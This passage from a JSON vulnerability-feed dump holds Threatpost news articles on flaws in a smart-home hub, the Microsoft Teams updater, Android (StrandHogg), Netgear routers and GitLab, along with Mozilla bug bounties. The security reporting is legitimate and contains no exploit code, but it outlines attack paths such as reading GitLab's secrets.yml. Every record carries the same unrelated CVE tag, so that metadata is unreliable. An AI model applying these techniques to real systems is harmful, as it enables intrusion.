lighting, hot-water temperature, heating, smart locks, shutters, blinds, fans, power outlets and more via an application installed on a smartphone.\n\nESET uncovered critical vulnerabilities in the hub, including the use of unencrypted HTTP protocol for the box\u2019s web GUI communication; essentially, all user communications \u2013 including sensitive data such as usernames and passwords \u2013 was sent over the network without encryption or any other form of protection, allowing any attacker to intercept the information in the clear.\n\nAlso at issue: Inadequate authentication, allowing all commands to be executed without requesting a login; a lack of session cookies, thus lacking any mechanism that could verify that the user was correctly logged in; and, peripheral devices connected to the smart RF box were vulnerable to record and replay attacks.\n\n\u201cUnauthenticated access to the web interface is a severe issue, as it gives anyone with access to the local network the ability to take control over the smart RF box and subsequently all the devices connected to it,\u201d according to the analysis. \u201cThis is especially worrying due to possible combination with other vulnerabilities that allow the attacker to gain a foothold in the local Wi-Fi network.\u201d\n\nAttackers would be able to extract information about peripheral devices, floor plans, errors, attributes of the managed smart home, the device\u2019s firmware version, and so on, ESET noted.\n\nUnfortunately, two of reported vulnerabilities (the unencrypted web interface communication and insecure radio frequency (RF) communication) appear to have remained unpatched, while only partial patches were issue for the others, ESET said. That said, the researchers haven\u2019t probed the latest generation of the device.\n\nThreatpost has reached out to the vendors for further comment.\n\n\u201cMost of the flaws disclosed by ESET have been fixed by the vendors of these particular devices,\u201d the researchers concluded. \u201cHowever, some of the issues appear to have been left unresolved, at least on older generations of devices. Even if newer, more secure generations are available, though, the older ones are still in operation\u2026.[security vulnerabilities in IoT devices](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>) are a prevalent issue.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-22T18:28:23", "type": "threatpost", "title": "Connected Home Hubs Open Houses to Full Remote Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-22T18:28:23", "id": "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4", "href": "https://threatpost.com/connected-home-hubs-full-remote-takeover/155037/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:43", "description": "Mozilla is bumping up its bug bounty payouts and has added new websites and services \u2013 including the recently deployed [Firefox Monitor](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>)\u2013 to its bug bounty program in hopes of attracting more researchers to sniff out vulnerabilities.\n\nThe browser-maker is doubling bug bounty payouts for most of its in-scope sites and services, as well as tripling payouts for the highest bug classification in its program, remote code execution vulnerabilities. Researchers can now [bring in $15,000](<https://www.mozilla.org/en-US/security/web-bug-bounty/>) for RCE flaws on \u201ccritical websites\u201d (sites and services considered critical to Mozilla operations, which pay out at the highest bounty rate) and $5,000 for \u201ccore websites\u201d (which pay out bounties, but at a reduced rate).\n\n\u201cMozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been,\u201d said Simon Bennetts with Mozilla [in a Tuesday announcement](<https://blog.mozilla.org/security/2019/11/19/updates-to-the-mozilla-web-security-bounty-program/>). \u201cTo celebrate the 15 years of the 1.0 release of Firefox, we are making significant enhancements to the web bug bounty program.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn addition, Mozilla announced that over the past six months, it has added new in-scope \u201ccritical websites\u201d and services for its program. This includes:\n\n * [Autograph](<https://github.com/mozilla-services/autograph>) \u2013 a cryptographic signature service that signs Mozilla products.\n * [Lando](<https://moz-conduit.readthedocs.io/en/latest/lando-user.html>) \u2013 Mozilla\u2019s automatic code-landing service which allows users to commit Phabricator revisions to their destination repository.\n * [Phabricator](<https://wiki.mozilla.org/Phabricator>) \u2013 a code management tool used for reviewing Firefox code changes.\n * [Taskcluster](<https://docs.taskcluster.net/docs>) the task execution framework that supports Mozilla\u2019s continuous integration and release processes.\n\nMozilla has also offered new Core sites to its program \u2013 including Firefox Monitor, a site where users can register their email address so that they can be informed if their account details are part of a data breach. Firefox Monitor, which made waves after it was announced in 2018 on the heels of Mozilla\u2019s partnership with Cloudflare and Have I Been Pwned (HIBP), went into [testing earlier this year](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) and has since been released.\n\nOther added \u201ccore\u201d websites that are now in-scope include:\n\n * [Localization](<https://mozilla-l10n.github.io/localizer-documentation/>) \u2013 a service contributors can use to help localize Mozilla products.\n * [Payment Subscription](<https://github.com/mozilla/subhub>) \u2013 a service that is used as the interface in front of the payment provide (Stripe).\n * [Firefox Private Network](<https://private-network.firefox.com/>) \u2013 a site from which users can download a desktop extension that helps secure and protect connections everywhere Firefox is used.\n * [Ship It](<https://wiki.mozilla.org/ReleaseEngineering/Applications/Ship_It>) \u2013 a system that accepts requests for releases from humans and translates them into information and requests that Mozilla\u2019s Buildbot-based release automation can process.\n * [Speak To Me](<https://github.com/mozilla/speech-proxy>) \u2013 Mozilla\u2019s Speech Recognition API.\n\nMozilla has continually increased rewards for bug bounty vulnerabilities over the years \u2013 the last time [being in 2015](<https://threatpost.com/mozilla-bug-bounty-payouts-going-up/113264/>). Mozilla started its [web bounty program](<https://threatpost.com/behind-numbers-mozillas-bug-bounty-program-092811/75701/>) in December 2010 and offered rewards of up to $3,000 for certain kinds of vulnerabilities reported in those sites.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2019-11-20T21:04:32", "type": "threatpost", "title": "Mozilla Bug Bounty Program Doubles Payouts, Adds Firefox Monitor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-11-20T21:04:32", "id": "THREATPOST:BED35CFCFED307909DB60602551982A6", "href": "https://threatpost.com/mozilla-bug-bounty-program-doubles-payouts-adds-firefox-monitor/150489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:44", "description": "COVID-19 has [spurred the use of videoconferencing](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) for businesses worldwide \u2013 and this expanded threat surface has lured attackers like moths to a flame. Adding insult to injury, researchers have recently discovered a workaround for a previous patch issued for Microsoft Teams, that would allow a malicious actor to use the service\u2019s updater function to download any binary or malicious payload.\n\nEssentially, bad actors could hide in Microsoft Teams updater traffic, which has lately been voluminous.\n\n\u201cDue to the noisy nature of the [updater] traffic, there is a possibility that malicious traffic hiding there will evade the analyst\u2019s view or even be added to a list of allowed, and therefore unmonitored, list of applications,\u201d explained Reegun Jayapaul, researcher at Trustwave SpiderLabs, in [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/>) released on Wednesday.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nWhile Microsoft tried to cut off this vector as a conduit for remote code execution by restricting the ability to update Teams via a URL, it was not a complete fix, the researcher explained.\n\n\u201cThe updater allows local connections via a share or local folder for product updates,\u201d Jayapaul said. \u201cInitially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to an\u2026SMB share.\u201d\n\nServer Message Block (SMB) protocol is a network file sharing protocol. To exploit this, an attacker would need to drop a malicious file into an open shared folder \u2013 something that typically involves already having network access. However, to reduce this gating factor, an attacker can create a remote rather than local share.\n\n\u201cThis would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step,\u201d Jayapaul said.\n\nTrustwave has published a proof-of-concept attack that uses Microsoft Teams Updater to download a payload \u2013 using known, common software [called Samba](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>) to carry out remote downloading.\n\nFirst, the researcher configured a Samba server for remote, public access. Then, a payload that supports the updater framework must be crafted and uploaded to a remote Samba server that has been authenticated from the Windows \u201cRun\u201d function.\n\n\u201cAfter a successful setup, I initiated the command execution, downloaded remote payload and executed directly from Microsoft Teams Updater, \u2018Update.exe,'\u201d the researcher explained.\n\n\u201cSince the installation is in the local user Appdata folder, no privileged access is needed,\u201d he added. \u201cAttackers can use this to masquerade the traffic (especially for lateral movement).\u201d\n\nMicrosoft won\u2019t be fixing the problem because \u201cwe determined that this behavior is considered to be by design as we cannot restrict SMB source for \u2013update because we have customers that apparently rely on this (e.g. folder redirection),\u201d the company told Trustwave.\n\nTo avoid or mitigate an attack, users can implement solutions that look for suspicious connections both inbound and outbound; and IT can install Microsoft Teams under the \u201cProgram Files\u201d folder, so an attacker cannot drop and execute the remote payload, according to the researcher. \u201cThis can be carried out by Group policy,\u201d Jayapaul said.\n\nCompanies can also disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team, he added.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-05T15:47:04", "type": "threatpost", "title": "Microsoft Teams Patch Bypass Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-05T15:47:04", "id": "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "href": "https://threatpost.com/microsoft-teams-patch-bypass-rce/158043/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:09", "description": "Researchers have discovered a new Android vulnerability that could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages, and basically take over various functions as if they are the device\u2019s owner.\n\nSecurity researchers John H\u00f8egh-Omdal, Caner Kaya and Markus Ottensmann at Norwegian app-security provider [Promon](<https://promon.co/>) discovered the flaw\u2014which they dubbed \u201cStrandHogg\u201d from old Norse for the Viking tactic of plundering villages and holding people for ransom. They said attackers can use the vulnerability to allow \u201creal-life malware to pose as legitimate apps, with users unaware they are being targeted,\u201d according to a [blog post](<https://promon.co/security-news/strandhogg/>).\n\n\u201cThe attack can be designed to request permissions which would be natural for different targeted apps to request, in turn lowering suspicion from victims,\u201d researchers wrote. \u201cUsers are unaware that they are giving permission to the hacker and not the authentic app they believe they are using.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIf the flaw is exploited, to users it appears that they are clicking on an app that they use every day, such as Facebook or Instagram. However, what happens when they click on the app is that instead of the app a user intended to open starting up, malware is deployed that can give permissions to the hacker, who is directed to the legitimate app, researchers said.\n\nThe flaw, which can be exploited by \u201creal-life malware,\u201d affects all Android devices, including those running Android 10, they said, as well as puts the top 500 most popular apps at risk.\n\nResearchers from Promon partner Lookout already have identified 36 malicious apps exploiting the vulnerability, which can be done without gaining root access to the device, according to the post. Among those apps were variants of the BankBot Trojan\u2014widespread malware that\u2019s been detected all over the world\u2013observed as early as 2017, researchers said.\n\nMoreover, the persistent problem of malware slipping under the radar on Google Play is what appears to be responsible for the spread of malicious code that exploits the flaw, researchers said. While the specific malware sample that Promon researchers analyzed did not reside on the app store, it was installed through several dropper apps/hostile downloaders distributed on Google Play, they said.\n\nWhile these apps have since been removed, dropper apps continue to be published in spite of protections that exist on the store, researchers said. In fact, some are being downloaded millions of times before being spotted and deleted, they said.\n\nIndeed, Google has [struggled mightily](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>) with malware [making its way onto Google Play](<https://threatpost.com/google-play-malicious-apps-racked-up-335m-installs-in-september/148810/>) under its watch and recently has taken [new steps](<https://threatpost.com/google-bad-android-apps/149981/>) to try to alleviate this problem. The discovery of StrandHogg appears to make the need for better security for Android mobile apps all that more urgent.\n\nIndeed, the existence of the vulnerability already being exploited in the wild certainly is troubling, as it means users already likely have been compromised and remain at critical risk, observed Sam Bakken, senior product marketing manager, for digital identity and anti-fraud solution provider [OneSpan](<https://www.onespan.com/>).\n\n\u201cAs you might imagine, criminals salivate over the monetization potential in stolen mobile banking credentials and access to one-time-passwords sent via SMS,\u201d he said in an e-mail to Threatpost. \u201cPromon\u2019s recent findings make the vulnerability as severe as it\u2019s ever been.\u201d\n\nThere is some good news in all of this, Bakken said. Security solutions do exist \u201cunder the umbrella of in-app protection\u201d that can protect devices from malware exploiting StrandHogg, including \u201capp shielding and runtime protection [that] make it easier for app developers to mitigate these windows of exposure resulting from security issues in both Android and iOS,\u201d he said.\n\n**[Free Threatpost Webinar:](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)** _**Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. [Join us on Dec. 18th at 2 pm EST](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. [Click here to register](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>).**_\n", "cvss3": {}, "published": "2019-12-03T13:26:14", "type": "threatpost", "title": "\u2018StrandHogg\u2019 Vulnerability Allows Malware to Pose as Legitimate Android Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-12-03T13:26:14", "id": "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "href": "https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:23:48", "description": "UPDATED\n\nResearchers this week said they discovered an unpatched, zero-day vulnerability in firmware for [Netgear](<https://www.netgear.com/>) routers that put [79 device models](<https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/>) at risk for full takeover, they said.\n\nNetgear has since issued several hot fixes, [available here](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\nThe flaw, a memory-safety issue present in the firmware\u2019s httpd web server, allows attackers to bypass authentication on affected installations of Netgear routers, according to two separate reports: [One on the Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI) by a researcher called \u201cd4rkn3ss\u201d from the Vietnam Posts and Telecommunications Group; and a separate [blog post](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>) by Adam Nichols of cybersecurity firm [Grimm](<https://blog.grimm-co.com/>).\n\n\u201cThe specific flaw exists within the httpd service, which listens on TCP Port 80 by default,\u201d according to the ZDI report, which covers the bug\u2019s presence in the R6700 series Netgear routers. \u201cThe issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAuthentication is not required to exploit the vulnerability, which attackers can use to gain root privileges, according to the report.\n\nZDI said it informed Netgear of the vulnerability in January. The vendor had asked for an extension until the end of June for public disclosure, which ZDI declined.\n\nFor his part, Nichols discovered the flaw initially in the Netgear R7000 router series, but eventually identified 79 different Netgear devices and 758 firmware images that included a vulnerable copy of the web server.\n\n\u201cThis vulnerability affects firmwares as early as 2007 (WGT624v4, version 2.0.6),\u201d he said in his post. \u201cGiven the large number of firmware images, manually finding the appropriate gadgets is infeasible. Rather, this is a good opportunity to automate gadget detection.\u201d\n\nNichols said that the problem lies in lack of support for a feature called [stack cookies](<https://en.wikipedia.org/wiki/Stack_buffer_overflow#Stack_canaries>), or stack canaries\u2014a reference to the use of a \u201ccanary in a coal mine\u201d\u2013which are used to detect a stack buffer overflow before execution of malicious code can occur, he explained. While some Netgear routers support this feature \u2013 namely, the D8500 firmware version 1.0.3.29 and the R6300v2 firmware versions 1.0.4.12-1.0.4.20 \u2013 most others do not, he said.\n\n\u201cLater versions of the D8500 and R6300v2 stopped using stack cookies, making this vulnerability once again exploitable,\u201d Nichols explained in the post. \u201cThis is just one more example of how SOHO device security has fallen behind as compared to other modern software.\u201d\n\nWeb servers in the firmware of SOHO devices in general are often the most vulnerable aspect of the system as they \u201cmust parse user input from the network and run complex CGI functions that use that input,\u201d he said.\n\n\u201cFurthermore, the web server is written in C and has had very little testing, and thus it is often vulnerable to trivial memory-corruption bugs,\u201d Nichols said.\n\n## **Exploitation**\n\nThe zero-day vulnerability can be exploited in two ways, Nichols explained in his post. One way to is to exploit the recv function used in the http parser in the web server through a series of steps that eventually lead to a stack-buffer overflow.\n\nAttackers also can use a cross-site request forgery (CSRF) attack to exploit the vulnerability, though he or she needs to know the model and version of the router they\u2019re targeting to pull this off successfully, he explained.\n\n\u201cIf a user with a vulnerable router browses to a malicious website, that website could exploit the user\u2019s router \u2026 by serving an HTML page which sends an AJAX request containing the exploit to the target device:\u201d Nichols said. \u201cHowever, as the CSRF web page cannot read any responses from the target server, it is not possible to remotely fingerprint the device.\u201d\n\nOne mitigation for the vulnerability is to restrict interaction with the service to trusted machines, according to the ZDI report.\n\n\u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it,\u201d according to the report. \u201cThis could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nIn March, [Netgear patched](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. It also addressed two high-severity bugs impacting Nighthawk routers, 21 medium-severity flaws and one rated low.\n\n_**This story was updated June 25, 2000 at 11:30 a.m. ET to include information on Netgear\u2019s hot fixes.**_\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-19T13:05:37", "type": "threatpost", "title": "Netgear Zero-Day Allows Full Takeover of Dozens of Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-06-19T13:05:37", "id": "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "href": "https://threatpost.com/netgear-zero-day-takeover-routers/156744/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:55", "description": "A critical GitLab vulnerability, which could be leveraged by a remote attacker to execute code, recently netted a researcher a $20,000 bug-bounty award.\n\nThe flaw was reported to GitLab by software developer [William Bowling](<https://twitter.com/wcbowling>) via the [HackerOne bug bounty platform](<https://hackerone.com/reports/827052>) on March 23. It was then disclosed this week after being patched in GitLab version 12.9.1.\n\nAt issue is a path-traversal flaw in GitLab, which started out as a web-based Git repository manager but has moved into the DevOps lifecycle-management space. A path traversal is a web security flaw that allows an attacker to read arbitrary files on the server that is running an application. For this particular flaw, the ability to read arbitrary files on the server would give attackers access to tokens, private data, configs and more.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nSpecifically the flaw exists in the UploadsRewriter function of GitLab, which is used to duplicate files. The UploadsRewriter does not validate the file name and path, allowing arbitrary files to be copied without restriction when moving issues to a new project.\n\n\u201cAs there is no restriction on what file can be, path traversal can be used to copy any file,\u201d said Bowling in his bug-bounty report. \u201cThe file or path should be validated before copying files.\u201d\n\nBowling then took the flaw a step further, showcasing how it could be leveraged to launch a remote code-execution attack. Once the arbitrary file read flaw is exploited, he said, it can be used to grab the secret_key_base from the /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml service.\n\nThe secret_key_base is used to derive keys that are used to generate and verify encrypted or signed cookies. Once attackers access the secret_key_base, they could manipulate these cookie services to send cookies to the server to execute code.\n\nGitLab verified the finding and escalated the issue to its engineering team, granting Bowling an initial $1,000 triage payment for his findings before ultimately granting the $20,000.\n\nGitLab in December [announced it had awarded a total of $565,650](<https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/>) in security bug bounties to 171 researchers who reported valid vulnerabilities in the past year. GitLab launched its [bug-bounty program](<https://hackerone.com/gitlab>) in 2018, and according to Juan Broullon, senior application security engineer at the company, it received a total of 1,378 reports from 513 white-hat hackers in that time.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-04-29T16:39:56", "type": "threatpost", "title": "Critical GitLab Flaw Earns Bounty Hunter $20K", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-29T16:39:56", "id": "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "href": "https://threatpost.com/critical-gitlab-flaw-bounty-20k/155295/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:48", "description": "UPDATE\n\nNetgear will not patch 45 router models that are vulnerable to a high-severity remote code execution flaw, the router company revealed last week. However, the company says that routers that won\u2019t receive updates are outdated or have reached EOL (End of Life).\n\nThe [remote code execution vulnerability](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) in question, [which was disclosed June 15](<https://threatpost.com/netgear-zero-day-takeover-routers/156744/>), allows network-adjacent attackers to bypass authentication on vulnerable Netgear routers \u2013 sans authentication. The high-severity flaw affects 79 Netgear Wi-Fi routers and home gateway models \u2013 but Netgear says that 45 of those router models are outside of its \u201csecurity support period.\u201d\n\n\u201cNetgear has provided firmware updates with fixes for all supported products previously disclosed by ZDI and Grimm,\u201d Netgear said in a [press statement](<https://www.tomsguide.com/news/netgear-routers-no-fixes>). \u201cThe remaining products included in the published list are outside of our support window. In this specific instance, the parameters were based on the last sale date of the product into the channel, which was set at three years or longer.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nA full list of the router models that won\u2019t be patched \u2013 as well as those that have fixes being rolled out \u2013 [is available on Netgear\u2019s website](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\n\u201cWhen we look at support windows, some of our products last five or six years, while others last only a few years,\u201d David Henry, senior vice president of Connected Home products at Netgear, told Threatpost. \u201cWhen we launch a product, as it gets old it goes into End of Life (EOL) and we stop building it and wind down [sales into the channel].\u201d\n\nFor instance, one such Modem Router that won\u2019t receive an update, the AC1450 series, is as old as 2009. Other router models, while newer, have reached EOL: The [R6200 and R6200v2](<https://kb.netgear.com/23748/R6200v2-FAQs>) wireless routers reached EOL in 2013 and 2016, respectively; while the Nighthawk [R7300DST](<https://www.amazon.com/NETGEAR-Nighthawk-Wireless-AC-Gigabit-Adapter/dp/B01HB56E5G>) wireless router reached EOL in the first half of 2017, said Henry.\n\nRegardless, Henry stressed that customers using both newer and older router models stay updated on security updates, as well as adopting best security practices, including turning off features like remote access or changing admin passwords (which he said is enforced by Netgear).\n\n\u201cI think it is really important that customers are paying attention to the updates we send out quarterly on our products,\u201d said Henry.\n\n## **The Flaw **\n\nAccording to the [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI), which first disclosed the issue, the flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this flaw to execute code in the context of root, according to ZDI.\n\n\u201cGiven the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines,\u201d according to ZDI. \u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nThe flaw was reported to Netgear on Jan. 8, 2020, and on June 15, 2020 the security advisory for the flaw was publicly released without a patch available. Additionally, a PoC exploit was published by the [GRIMM blog on June 15.](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>)\n\nNetgear has rolled out patches for 34 of the vulnerable models since the flaw was disclosed. That includes releasing \u201csecurity hotfixes\u201d for the models, which are fixes that are applied on top of existing, fully tested firmware.\n\n\u201cReleasing hotfixes allows Netgear to quickly update existing products and streamline the firmware verification process without going through full regression testing,\u201d according to Netgear. \u201cThese hotfixes are targeted at specific security issues and should have minimal effect on other areas of the product\u2019s code.\u201d\n\n## **Patch Timeline Backlash **\n\nSeveral security experts are criticizing Netgear for its patching policies and procedures. Brian Gorenc, senior director of vulnerability research and head of Trend Micro\u2019s Zero Day Initiative (ZDI) program, told Threatpost that the vulnerabilities disclosed represent some of the most severe bug categories available.\n\n\u201cUnfortunately, there are too many examples of vendors abandoning devices that are still in wide use \u2013 sometimes even when they are still available to purchase,\u201d Gorenc told Threatpost. \u201cMaybe we need to recommend manufacturers who support their products for longer \u2013 especially in our digitally connected lives. If we reward good communications and long-term support from vendors, maybe this abandonment problem will get better.\u201d\n\nZach Varnell, senior AppSec consultant at nVisium, said that the disclosure on this vulnerability \u201cappears to be more than generous since the researcher followed responsible disclosure practices and even gave an extension when asked for it.\u201d\n\n\u201cIt\u2019s unfortunate for anyone who owns one of those routers but that\u2019s the reality of product lifecycles,\u201d said Varnell. \u201cBasically everything \u2013 including software, toys, cars, electronics, appliances \u2013 will reach an age where their manufacturer will no longer support them. The duration of support varies widely and software tends to be on the shorter side since new development is done much more rapidly than hardware.\u201d\n\n\u201cConsumers should always ensure their devices are still supported by manufacturers and check the available support before purchasing a new device,\u201d said Gorenc.\n\nVulnerabilities in routers have been discovered several times over the past year. In March, [Netgear warned users](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) of a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. In July, a pair of [flaws in ASUS routers](<https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/>) for the home were uncovered that could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\n_This article was updated on Aug. 4 at 11:30 am ET with further comments from Netgear. _\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-08-03T19:03:46", "type": "threatpost", "title": "Netgear Won't Patch 45 Router Models Vulnerable to Serious Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-03T19:03:46", "id": "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "href": 